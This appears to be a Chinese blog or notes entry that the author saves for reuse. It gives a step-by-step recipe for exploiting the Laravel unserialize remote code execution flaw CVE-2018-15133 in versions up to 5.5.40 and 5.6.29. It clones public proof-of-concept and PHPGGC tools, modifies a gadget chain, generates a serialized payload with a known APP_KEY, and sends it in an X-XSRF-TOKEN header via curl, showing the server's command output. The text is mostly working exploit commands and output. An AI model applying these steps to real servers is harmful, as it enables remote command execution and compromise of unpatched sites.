最近刚好遇到一个站laravel,可惜不在版本,mark以后方便使用
漏洞前提:
该漏洞可以分别在两个地方触发,一个是直接添加在 cookie 字段,例如: Cookie: ATTACK=payload ;
另一处是在 HTTP Header 处添加 X-XSRF-TOKEN 字段,例如: X-XSRF-TOKEN: payload
漏洞影响版本:
5.5.x<=5.5.40、5.6.x<=5.6.29
1.获取POC
git clone https://github.com/kozmic/laravel-poc-CVE-2018-15133.git
2.拉取PHPGGC工具(如果只是测试可以不用拉取这个工具)
git clone https://github.com/ambionics/phpggc.git
因为本地是PHP7.2环境 需要修改PHPGGC代码,执行:
sed -i -e 's/assert/system/g' gadgetchains/Laravel/RCE/1/gadgets.php
3.查看本地APP_KEY
grep -e \^APP_KEY .env
APP_KEY=base64:RFU0lGJ4lnVLMCEB5Jl8I25u5o/l7GLLkSivNLUZqro= //demo
4.使用PHPGGC生成利用代码
phpggc Laravel/RCE1 'uname -a' -b Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9
5.利用cve-2018-15133.php生成laravel漏洞利用代码
./cve-2018-15133.php APP_KEY Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9 PoC for Unserialize vulnerability in Laravel <= 5.6.29 (CVE-2018-15133) by @kozmic HTTP header for POST request: X-XSRF-TOKEN: eyJpdiI6Im1oalNPUzZIMlFZeVBXYjdRb2FDRFE9PSIsInZhbHVlIjoid3JcL09JRGVZWnBUSjlYREY1RHlTUzl0bTRIUjlFdHYwNVBpYk9iOTg5dngrRTROYk9GQllkckVMdXl4ckoxWmpWbmc1NVhIelB1K25XdDRZZTBkMXRIbDlYUzdsZWQ2SUNYZmNuRmhNRmU5XC8wOGZKMEJLUEY3OW1CXC9mWXBBcnhCR3dcL0Qzenl4QzlCSVFiN3paK1V5YTVicGFzMFYwelIwZWppZ3BYbDhzdjVDSDE3Z3N4Tjk1VHVyQytJbWd0bjN4dTVcL1pyT2oyVDJWR29iVHdBcTdoRkszMGFqSSs2eTlhbTdjVlhcL0c2V3VGdEdDZ2RrSG4rXC9jYWFPNVhJazUiLCJtYWMiOiI0MTY1MDNkN2UwODI5ZDc4YTg5YTY3N2U5MjY0YWZiN2U2YjdlMTAxNTZiYTIyODhkNmY1YmYxMmFkNzgyNTFhIn0=
6.测试漏洞
curl -X POST http://web.black_card.me/login -H 'X-XSRF-TOKEN: eyJpdiI6Im1oalNPUzZIMlFZeVBXYjdRb2FDRFE9PSIsInZhbHVlIjoid3JcL09JRGVZWnBUSjlYREY1RHlTUzl0bTRIUjlFdHYwNVBpYk9iOTg5dngrRTROYk9GQllkckVMdXl4ckoxWmpWbmc1NVhIelB1K25XdDRZZTBkMXRIbDlYUzdsZWQ2SUNYZmNuRmhNRmU5XC8wOGZKMEJLUEY3OW1CXC9mWXBBcnhCR3dcL0Qzenl4QzlCSVFiN3paK1V5YTVicGFzMFYwelIwZWppZ3BYbDhzdjVDSDE3Z3N4Tjk1VHVyQytJbWd0bjN4dTVcL1pyT2oyVDJWR29iVHdBcTdoRkszMGFqSSs2eTlhbTdjVlhcL0c2V3VGdEdDZ2RrSG4rXC9jYWFPNVhJazUiLCJtYWMiOiI0MTY1MDNkN2UwODI5ZDc4YTg5YTY3N2U5MjY0YWZiN2U2YjdlMTAxNTZiYTIyODhkNmY1YmYxMmFkNzgyNTFhIn0='| head -n 2 % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1616 0 1616 0 0 4603 0 --:--:-- --:--:-- --:--:-- 4603 Linux 9a29d8604c7a 4.15.0-42-generic #45-Ubuntu SMP Thu Nov 15 19:32:57 UTC 2018 x86_64 GNU/Linux <!DOCTYPE html>
# http://blog.tuo0.com/2018/12/16/php/laravel-CVE-2018-15133%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
# https://xz.aliyun.com/t/6533